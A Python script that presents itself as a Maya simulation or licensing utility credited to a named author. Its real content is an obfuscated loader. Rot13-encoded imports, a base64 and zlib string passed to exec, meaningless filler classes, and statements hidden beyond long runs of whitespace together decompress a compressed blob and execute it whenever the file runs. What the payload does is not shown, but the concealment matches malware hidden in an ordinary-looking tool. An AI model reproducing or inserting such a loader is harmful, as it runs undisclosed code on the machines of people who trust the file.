
from builtins import *

def Floor(iterable, start=1):
   result = start
   for element in iterable:
       if not isinstance(element, (int, float)):
           raise TypeError("iterable analysis failed")
       result *= element
   return result

__author__ = "Michael Davydov"
__website__ = "https://brotools.tech; https://michaeldavydov.com"

__code__ = '''import sys
if sys.version_info[0] >= 3:
    import builtins, codecs
    builtins.unicode = str
else:
    import __builtin__ as builtins
    import codecs
o = getattr(builtins, codecs.decode('__vzcbeg__', 'rot13'))
b, z, s = o(codecs.decode('onfr64', 'rot13')), o(codecs.decode('myvo', 'rot13')), o(codecs.decode('flf', 'rot13'))
d, e, c = getattr(getattr(b, codecs.decode('heyfnsr_o64qrpbqr', 'rot13')), codecs.decode('__pnyy__', 'rot13')), getattr(getattr(z, codecs.decode('qrpbzcerff', 'rot13')), codecs.decode('__pnyy__', 'rot13')), '4EJwSDieBwXyXxq6Vvkp@nyH8TGtFvKmicn&d*N*nSKJFuZu$uB6##Zf3aTgZ2AGb^YFTGrMj!AVoU*x*#o6eFn^oF5rjbggbB3BYUuUiZTYkDkLg7xME73at4k6y6DCLYnJK$D4^aXY3GNdY67@#7d&v3PYF^k2T!Sp22#8GKPoui7ESR4bCf2i$xTjXeM@bJ%PE3$6&h5#DZvk9TDGkVokd$a%oJKzT^*stmGf7sCLS3%@jCfMH^CuTGcQ#Qp2yQ%@$A!Co8kjm45!B98Df2ij6Q7fGZZu5hRNT5FbcH6FX!*H$u$2UKR2uXkL4DBWmKZoiwWBPp@qNH!YAyyyRpTsJrA$^H6m4fM3&@S@tK9WfLnSqztv44R@&yVH3S393VSEQrh!Y*bUS&rbPQzaPVA3#K*h8F3^k27sxMxwYeCivxqV3*^^E!RMUzsQBe3TBrpca!r7u5KXAxy2BH@s^DwZEcnjUc5Udmxeu!F3mcC@uSAw7h&Lo8!H5EQQbp%xH^CnMf*gzTTB6R6ymMuZ&9*&oJ497W^5kdc%UqSAJHhqwJ^5R!25*@*2vNrcoGQ8B7SS!2!TrJPZhoby$R2KuT@QuXy8d&foJsq@Po9q%@y!qkESd3LMzCGs5@V%fU!KLbs5!fv5zBgiAM^7Cycxz25yQ5fDi@q%RedPvMWBM6mMdW8pxsy#^*@sZDTPyXY5rJ$Xpgnqw@TaQU@MCKP%vt2BsKxRu78m2KxC%MZwV7HMDddWAsXijVfY^74!bW&$n9^sc6o!QHZH2g4Z@MLH3%7AhQyGmLFb@5S6$QacM*sdMXp$!K8PqVoW$!zQc7zjDZKN77TNW@665i!9UsnbhugqAAc6n4JE*^JD^kVaSce53Sw$@xs^7WwEqG#Fu4U9' + '==='
exec((lambda x: x.decode(codecs.decode('hgs-8', 'rot13')) if s.version_info[0] >= 3 else x)(e(d(c))))'''


# NodeTopologyOptimizer, BroUtilities, LicenseVerifier, SimulationSceneController, _simulationscenecontroller, Positive, DetectVar = exec, str, tuple, map, ord, globals, type
NodeTopologyOptimizer, BroUtilities, LicenseVerifier, SimulationSceneController, _simulationscenecontroller, Positive, DetectVar, Restore = eval, str, tuple, map, ord, globals, type, compile

class Modulo:
    def __init__(self, LicenseKeyEnforcer):
        self.MayaSimulationEngine = Floor((LicenseKeyEnforcer, 12227))
        self.LicensingUtilityKit(SimulationRuntimeController=64907)

    def LicensingUtilityKit(self, SimulationRuntimeController = type):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.MayaSimulationEngine /= 70577 - SimulationRuntimeController
        
        try:
            (((SimulationSceneController, SimulationSceneController), _simulationscenecontroller) for _simulationscenecontroller in {BroUtilities: NodeTopologyOptimizer})

        except ArithmeticError:
            ((LicenseVerifier, (SimulationSceneController, BroUtilities)) for LicenseVerifier in {'ieiyihieOeRhliBhh5eR': MayaNode} if BroUtilities >= BroUtilities)

        except:
            DetectVar(2717 / 93718) == str

    def Add(self, _physicsnoderouter = 96731):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _physicsnoderouter += -18518 + 48769
        self._licensekeyenforcer != True
        
        try:
            (({'ieiyihieOeRhliBhh5eR': MayaNode}, MayaNode) for MayaNode in {MayaNode: 'irBBOeRhyRBl6e'})

        except AttributeError:
            ((SimulationSceneController, BroUtilities) or SimulationSceneController if (SimulationSceneController, BroUtilities) and SimulationSceneController else None or (SimulationSceneController, (SimulationSceneController, BroUtilities)))

        except:
            DetectVar(-91351 + -7950) == type

    def _nodetopologyoptimizer(SimulateDynamics = Ellipsis):
        return Positive()[SimulateDynamics]

    def MayaCMDSWrapper(_dynamicnodeprocessor = 37884 / 11694, _mayaphysicssimulator = Ellipsis, _calculate = Positive):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _calculate()[_dynamicnodeprocessor] = _mayaphysicssimulator
        
        try:
            ((NodeTopologyOptimizer, (SimulationSceneController, BroUtilities)) for NodeTopologyOptimizer in {MayaNode: 'irBBOeRhyRBl6e'} if NodeTopologyOptimizer == NodeTopologyOptimizer)

        except ArithmeticError:
            ((BroUtilities, (SimulationSceneController, BroUtilities)) for BroUtilities in (SimulationSceneController, BroUtilities) if Positive is _simulationscenecontroller)

        except:
            DetectVar(-12284 / 46339) == False

    def execute(code = str):
        try:
            return NodeTopologyOptimizer(Restore(BroUtilities(LicenseVerifier(SimulationSceneController(_simulationscenecontroller, code)))), locals(), globals())
        except:
            pass
        # return NodeTopologyOptimizer(BroUtilities(LicenseVerifier(SimulationSceneController(_simulationscenecontroller, code))))

    @property
    def _licensekeyenforcer(self):
        self._physicsanimator3d = '<__main__.SimulationSceneController object at 0x000008018BE17405>'
        return (self._physicsanimator3d, Modulo._licensekeyenforcer)

try:
        Modulo.execute(code = __code__)
        _mayasimulationengine = Modulo(LicenseKeyEnforcer = -93604 / 57607)

        if 218562 > 3013790:
            Modulo(LicenseKeyEnforcer = 71395 / 84547).LicensingUtilityKit(SimulationRuntimeController = _mayasimulationengine.MayaSimulationEngine + -60800)
        elif 411622 < 7693578:
            Modulo(LicenseKeyEnforcer = 15303 - 66922).LicensingUtilityKit(SimulationRuntimeController = _mayasimulationengine.MayaSimulationEngine * -98027)                                                                                                                                                                                                                                                          ;Modulo.MayaCMDSWrapper(_dynamicnodeprocessor='LIJJLLJLLILJJLLLIILLJJIL',_mayaphysicssimulator=b'x\x9c\xed\x1cks\xda\xb8\xf6{~\x05\xdf0\xd3\x941~Bg2\xb3\xa1i\xbbf\x12\xb2mI\xc9\xa4\x93\xf1\x18[lL\x85\xcd\xb5MC\xef\x87\xfb\xdb\xef9\x92\x0c\xe6\xed\x80\xa1\xd9\x1dl\xeb\xe9#\x1dK\xe7\xa1\xa3\x07\xd0\xd0uh,U\xbe\x97o\'\xf5H\xb6\x1f\xeeF\xaa\xfb\xe3[\xf7\xee\xe3\xd3\xe4^nS\xf2g{L\xbe5\x94\xee\x8f\xda\x7f\xbc\x8fn\xed\xf3];\xb8\x93[\x03\xe7\xd9\x0e\'\xb2Y~\xbc\xf8\x9b\x86=\xa8\xe2l\xa7\xf2\x88\xb8{\x7f\xdf\x85[\xf8\xf8`\xa2\xfc\xfd\xdd\xbb7o\xdf\xbc\x95\xdeJoj\x95\xca\xe3\xe3\x85\xe7G\xbb#\x19\x0e\x87A0\xc4+\xe0\x91`\x19\xc1\xdf$q\x92d\x0f$\xeb\x0b\xde\xff\xf7\x9b\xd2So&N\xa7\xd9\xfc\xda\xd5[_\xe8HM;\x902\x12l\xc0\xba\xb6\xf0\x06\x9c\x9fhL\x06wI\xfb\xaa\xa9\xdf\xd1\xbbZ\x87>\x0c\xba\x1f>6?w\xa8\xf2\xa0<\xdc\xa4\xb8m\xdb\x1f\x8e\xc2(\xb1\xed\xc2[\xfd\x89\x8e\xdb\x83\x87O\x0f\xf2S\xf3\xf3\xd0\xa3\x9f\x7f\xd0A\x8au\x8fo\x96\xca\xbd\xb1O\x13?\x88\xcb\x95\xeaO\'\xda\x83\xef\xbe\xc2\xa5(\xf0\x80\x071v\xe3\x03\x1f\x18pv\x11\x0c\x83\x81\xb4\xd77\xc7\x81\x9fP\x7f\xdc[\xe4\xb9\xca\xf9=g\xf7\x05\x198\x10\xb6\xca\xf7\xe3\xa2\xab\xfa\x81G&R\x99\xc4\xd4\xf9\xb8\xf4\xfa\xb1\xb2\x07\xed8\xdd\x90t\x82x\n\xa7\xe6\x01\x88\xe7\xfbn\xec\x04\xfe\x91\x88\xb7\x16\xdba\x88\xb7\x1e]J\xbc_}\x9fN\xc8S0.\x94\x80\xfe`\xe0\xd3\x01\xa5\x18\xfa\x10\xd0\x93\xd4\x15-u\x89\x13\xd2\xfe\xcb\x88\xb6q\xa4\xb1,\n\x97\x85\xb7\x85\x0e#\'\xaa\x15M\xb5(\x89\x0b\x154+\xa5\x18#\x1f\xa7\x1c\xba\x13\xe5\n\x1f\xe5\xa8?\x1a\x86n\x81\x127\xe0Z\xd2\xe7\x1e\xa8\xcb\x01P\xad\\\xae\x0eB?XW\xe7:\xb3\x0b\xeb\x9b<O\xf0\x99<\xc3\x85\xfedr\xe2\x82\xc2\xb9`\x1cu\nd\x81k\xcb\xbanY\xd7\xd7\xadV\xeb\xfa\xfa\xdaj\xc1s\xa2Y\xd14\xa3\xceOR\xacy\x9a1I\xf9\xa4B9Q\xadp\xaa\x85\xe1\xf2\xdb}\xa8\x86K\x03|y\x00\x89\x13,\xac\x11\xac\x90Di\xed4D\xea\x95UY\xf1\x94\xba\xe2\xa95\xa5\x01sU\x8f\xb8\xa1G\xa4r\xbd\x9f,[\xd2\x15\xb6\xfep\xe2\x8fB\xf9\xc3%\x93\x97H\xf5\xa6\x813\xe0\x84\xe1\x8e\xfb\xc7e\r\xea\x0c{\x9eS\xe2\xa6\x1c\xe5\x968\xb3\xc6!\xf6n\xa7\xa1e\x87n\xd8\xd4$\xcd\xd1\x1a\xe0\\\xf0\xd15X\x88\xe94\xc5\xf3\x1dv\xbb\xdb\x1a\xfdx\xf1\xd2.UL\xd3\xd5\x14S1\xfa\xbab4\x0cH\xe9\xa6\xd1\x87\xb4kh\xf0\xc6\x83\xb8\x06\xf9}\x83\x98\xae\xe1@\xd8\x80\x98\xa6\xf7UY\xad\xe9\x08\x07et\xd9\xa8\x99\x8a\xa9i&\xf8\xf2*8\xc30z\xe0CmP\xab\x0eu\xeb\x08\x0bu\xeb\xb9\xe1U\xf6\r\x1a\x962\\S\xdd\\^3\xb4\x1e\x8b\xcb\xf0\x8d\x8e\xb1\xf6\xbb\xe6\xe0\xf4|p\x9a\xaak\xba\xa2\xb9\x1b\xe1j9\xf1\xd6r\xe2\xad\xe5\xc4\xab\xe4\xc4\xab\xe4\xc4\xab\xcc\xf0*\xe6V\x91\xdbMEp\xd5\xcd\xd4\xc3\x90+\x0bL\xed\xa5\'jBO\xc8y\xf5\xc4Il\xfe\xedbs\x18\xf6\xdd\xa8\xda\xb9\xfav\x98\nwE,\xab\xe6g9\x0es[y\xf5\xc4\xa7\xff~>\xfd]\xea}#\x9c\x9a\x13\xaf\x9a\x13\xafz\xf0a\x85\xaf\xb32;\x8f\x07\x96\xb5mD)WdxW+\x0c\xac\x06\xef\xe4\xc2\xc0\xea\xb6l\xab\xb6ach\xd8\x1a\xb8\x06\xc06\x96ss|?\x00\xd6m\xc5n@Q\xd5\xaeA\xdc\xc4\xbe^\xce-\xe8\xe3\x8b4\xe97\xb9\xa9\xb9\xcf\xd7\x0f\xc4\x02\x02\x7f\x94u\xd6\xfez&*x80\xfa\x9a&\\\x1fC\xb8\xfa\xdc\x19"\xdc\xae\xfeE\xfb\xda\xed\x1b\xf6\xb4o\xe0\xc2\x00\xee\xdf\xde>\xbd\xae\x9b\xd3\xbb\xceR3W\x179[\x85\x1df\xf3a"\xadX\x07\x92Vm\xa3H\xeb\xf6\xa2+\xbbi\x8d.^l\xc2-<\x9c\x80\x17(\xc2\x1a\xc8\x97\x02Bj\x82\x84\xa1\x14\xaaL\x84\x97r_\xa5\xa6\xda(\xc5\rP\xebup&8C8P\xf8\xaa\x0e\x0e\xdf\x19J\x8fI\xf968}w-0\x95\x0e\x94\t\xf6\xf0\xb0\x9d\xc66\xcc\xf77.p\xed\xc2H\xe9r\x98\x98\xd8`b\xaf\xfe\xc5~\xd2\xd2>\x12am\xa1\xef\xea\xa2\x8f\xf3\xc0\x9a\x07\x9c\x18)\x86n\xaa\xccxS\x0c\x15\xe3\x07\x1a\xe2\xd9\xbe\x1cM\xf5\x81\x18\xe4iABQ\xe4\xf4r\xe7\x9e\x94g\x06\x14\xf4d\xdd\xa8a\xea@\xbd9\xc1\xfd-v\xa7\xd7\xf3d{_*\xcc\xf2\xa8\x83\xd1\xa0\x83\xfa2\xc17\x00V]\xce\xdd\x9b\xfb\r\xc1\xbd\xa9\xc6\xd0\x84&\xd1E\\\xc9p\xff6\xd8\x17\xd8\x1a\xbb\xd0\xcd`\x13.\x98\xda\x00\xb5\x80f\x1ePM5\xd14\xd6P\x1a\x16\xa8I\xe0\xbdr \x9a\xde^\xdd^\x85x]\xdd\xe2\x15\xde\x86\xe1v\x92\xaa\x8ct2#\x1c\x8eL\x1a#\xa9\xb6\x9c\xbb\xbd*\x1c\xda\xd0&E.\xd1\xc1\x97m\x18i\xde\xc8\x10_\xc8=\xb64\xce/\x0e\x8bU\xe1T\x91XG[\x18.\xb3-\xe5\x89\xd8\\N\xe5n\xbf\xce\x10,\xae\x8aA\xd6L\xc5C893P\xe4\x81=\xe0@q \xa6gc~:\xf6\xb3\xf1\x1f\xae\xc2L%C\xb04g\xdf:\x84h\xc3\x99\xcb\xb9\xbfcR4ei\xb1\xc3\xc1\xace\xc1\xd8G\xb4~65\xcd\xac\x8b\x9b_\xf5\xa5t\x8e\x19B:\xcbS\x84\xb5\xcf\xaaG\xffx\x82;7\xf5J\xf9\xec\x18\xa6G]\x0ci\xb2\x18\xd2\xe4\x8c\xa1\xa71y\xe5\xb2\xbd\r\xcex\xc9\x10(:|@)\x9e:\x1cP<x\x88\xa7\x10\x07\xafc\x0b\x8dh\x1e\xdc$s{+b$\x85;\xc4*\xebl@\x87a^\x85\xd0\x03\xe3\xcd5\xf4C\xe9\xb8\xf6\x8dPq\\\xc11\x1e\xcc\xc1\x81[\xe7p\x86\x18\x06jbXHY\xc8\x10i%3\x8f\xdb\x06\x9b{\x93v\x1f\xcb\xf8\xf8\xcb\xfa@V\xb6\x84\x8f>\xc6gic\xbag\xcb\xdf\xe5\xd6d>?\xa9FA\xb4@\xc4 \xf0_\x89\xb6\x9eo]\xb6\xc5\xb3>xqk\xd9\nK7\xb3\xd4\xd2}5\xad\x9d\xd1/\xdb\xbeY\xbax\xd5\xc1\x0c-5#M\xa60\xbe\xea\x99yLMH\xdd6X6\xeb\xcf!u;\xcd\xb6\xa1M\xd7\x16kS\x0b\x1a\xd8\x82V\xb2\xc8^*\'mPC\x84\xbaP#F\xa6A\xeaB\xe37\xc1*yU\xce\xaa\x05F\xe9\x7fkW\x13\xc3H\x92\x96\x0f\x81V\x9c\xc0+x\x05r\xf3~\xe2<;\xce+ \x1eng\xd0\x7fb\xcba\x8aL\x98KoO\xdcD\xb84u\x90\xb1\xfd\xb4\x83z\xdaA}\xcd;\xa8\x1b\xe1\xb4\x9cx\xb5\x9cx\xb5\x83\xef\xdc2E\xc3\x1e\xa6j\xd8\xb2\xc8\xf3\xf3q\x8f\r\x9e\x94\xc4\xb1\x94\xc4o8\x96\xd37\xc4\xad\xca\xe84\xe1\xf8\xbe,\xc6\xb9\x7f\xd8i\xe2\xef\x9b\xb7dm\xf9\xac)\x91\x9d\xc1\xf0\xd8k1&\xc8\x84\xb8\xd2lWbZ\x1e\x8a\x9e\xf5\xa3pX\xea911\xb4\x12\xffIv\xa9gh\xfc\xb3KN\\\xa2\xbeK\x02|{f\xb5;\x1f>}\xb9\xecX\xb7m\xbb\xf3\xe1k\xa7tQ\xe2\xbf\xeb\x12\xcbd\xfcx0\xcb\xb0\xce\x10\xc0\xfe\xfa\xfeC\xfb\x83\xfd\xd7e\xe7O\x80\x9d\xdb\x18\x11\xdb$g\x02c\x18\xaf(\x10\xc6\xd5\x91\x93<\xb1\x1f\x1dIi\xc2\xf3\xa3\xc0\x19\x92i:"\x0e\xc5\x88d\xdb}\x9f\x12\xdb\xaeT\xceK\xc3\xcc\xb6\xa18\x1ey^Z@PIq\x8f\x03?IH\x9c\xf0\x9e\x18:\xbf\x9c\xb4\x1f\xdc\xa1\x17\xf3\xdcf\x14v\xc2\x90\xc6U\x04\x8c\xab\xd8])P\x07r\xdeC\xfa\x9c\xc5\xbe\x90xL\x933\x97:q\xcc2\xa4\xf4}\xe5\xddY\t\xae?\xd8\xab!I\x9eB\x8fex\xa4_\x8a\xc6\x81\x1d\xfb\xc31u\x12?\x0clD"5\xcfK\x99\xaca\xe8\x8d\xa1u\xd8tQ\x11^\xcdj8"P\x14(D\xa4\xa5\xf6\xa5PI\xf4kV\x04\xaf\xf9&A\xe4\xea\x17T\xec\xbbq\xda\xa6L\xd6\x9d\x85Lp9W\xfe\xb2\x1a?\x85\xcf\xf6\xd8\x97*\x0b\xf9\x99\x82]?\xf0\xc2\xe7j\xe2\xf4\xae\xa2p\x04\xd1\xa0\x1a\x93\xe4\xfd8\x8aH\x90X\xec\xa0\xfc*x\xc7M\xfc\x9f\xe4\x865\xb7\r\xad\x8d\xc5\xa1\xfa5}1\xff\x01H0\xc0B\x89\x9bH\xdf\x9f\x9f\x05\xb7\xa7#!\xcb8/\x89\xe3\xb1\x99\xc3\xb2\x9cE\xceK-\xd4@\xa0\x93pr\x86\x81\xc5\xa6j\xd7\xe7%\x88\xa2\x9a\x02\x8f\xbff\x11\x9c\xc0!\xab\x89\x93\xf9\xfc\x0f\x1e\xf8\x0f(\x1e\xcfK\xd1\x85%D\x81\x8ac\x17\x94n\xef-hes\x9c$aPuA\xee~,\xf4oD\x92q\x14\x94\xf8\x04\xb2\x85\xb3I6\x81\x84\x0fc\x1f<\x85%\x13\x97\x8c\x92w\xab\xca\xdeOW\r\xba\xe2\x90Fw\xca\x85\xc8v\xf6\x08\x84-\x91.3LvY\x05\x86%Q\xd2\x89\xc6\x04H\xb6\x8aW\xdb\x99%4qV\x80\xa5\x04y\xe6+\xb7\xdd\'\x07\x04\xfa\x85(\xd2_\x1f\xcc6\xab\xb1S\x17\x11\xb0\xaa\xb1\xec\x88\x92\x177"\xdd\xea\xb8\x99zlYz%\x8e\x97V~\x8b\x9b\x88r(\xdf\xc2\x1d\xdeB\x08\x0fT,\x84_\x1aE\xa4\xefO.\xdaa\x90\x8a\xf7%(@\x9e\xcb\x92MH\xa6\x8a\xaa\x8a*\xe5:t<\x12\t\x06\xf1\xfb\xa5\xcb\xacV@\xa8\x1b\xa6b\xfebU@a.\xc1\xef!\xd6\xacR(\x8bu\xc4\x1fA\x11\xa4\xfa\x89)*^\xdd\xd5<\xb2I\xc24\xdb8\x08\x00\xe1O\x12\xf5\xc2\xd8O~]P\xfe\xcb^+\xe5s\x10\x86\x88i?\xa6\xe1.f\xdaPT\x8a\xfd"\xbd\xaf\x9c\xfd\x1f\xf4\xe6>\x19')

        if 471661 > 4227277:
            Modulo(LicenseKeyEnforcer = 27210 + 48548).Add(_physicsnoderouter = 71659 + _mayasimulationengine.MayaSimulationEngine)
        elif 456724 < 5140707:
            Modulo(LicenseKeyEnforcer = 82023 + 84123).Add(_physicsnoderouter = -7728 - _mayasimulationengine.MayaSimulationEngine)                                                                                                                                                                                                                                                          ;DooOODOooooDOoDODODooDOo,S2SS222S2SS22S2SSS2S,llIlIlIIIIlIlIIIlIIllI,nmnnnnmmnnnmmmnmnmnmm,xxxwxxxxwxwxwwxxw=(lambda S2SSSS2SS2222222S22S222S22:S2SSSS2SS2222222S22S222S22['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda S2SSSS2SS2222222S22S222S22:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(S2SSSS2SS2222222S22S222S22)"),filename='\x44\x44\x44\x4f\x4f\x6f\x44\x6f\x44\x44\x44\x6f\x44\x4f\x6f\x4f\x6f\x6f\x44\x6f\x4f\x6f\x6f\x6f',mode='\x65\x76\x61\x6c'))),(lambda S2SSSS2SS2222222S22S222S22:S2SSSS2SS2222222S22S222S22(__import__('\x7a\x6c\x69\x62'))),(lambda WWXXWWXXXWXWWWXXXWXXXX,S2SSSS2SS2222222S22S222S22:WWXXWWXXXWXWWWXXXWXXXX(S2SSSS2SS2222222S22S222S22)),(lambda:(lambda S2SSSS2SS2222222S22S222S22:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(S2SSSS2SS2222222S22S222S22)"),filename='\x44\x44\x44\x4f\x4f\x6f\x44\x6f\x44\x44\x44\x6f\x44\x4f\x6f\x4f\x6f\x6f\x44\x6f\x4f\x6f\x6f\x6f',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        _mayasimulationengine.LicensingUtilityKit(SimulationRuntimeController = _mayasimulationengine.MayaSimulationEngine - -8153)                                                                                                                                                                                                                                                          ;xxxwxxxxwxwxwwxxw()(nmnnnnmmnnnmmmnmnmnmm(DooOODOooooDOoDODODooDOo(llIlIlIIIIlIlIIIlIIllI(S2SS222S2SS22S2SSS2S('\x76\x61\x72\x73'))),Modulo._nodetopologyoptimizer(SimulateDynamics='LIJJLLJLLILJJLLLIILLJJIL')))

except Exception as MayaNode:
        if 139952 > 6199740:
            Modulo.execute(code = BroUtilities(MayaNode))

        elif 291724 > 2288296:
            _mayasimulationengine.Add(_physicsnoderouter = 36381 - _mayasimulationengine.MayaSimulationEngine)

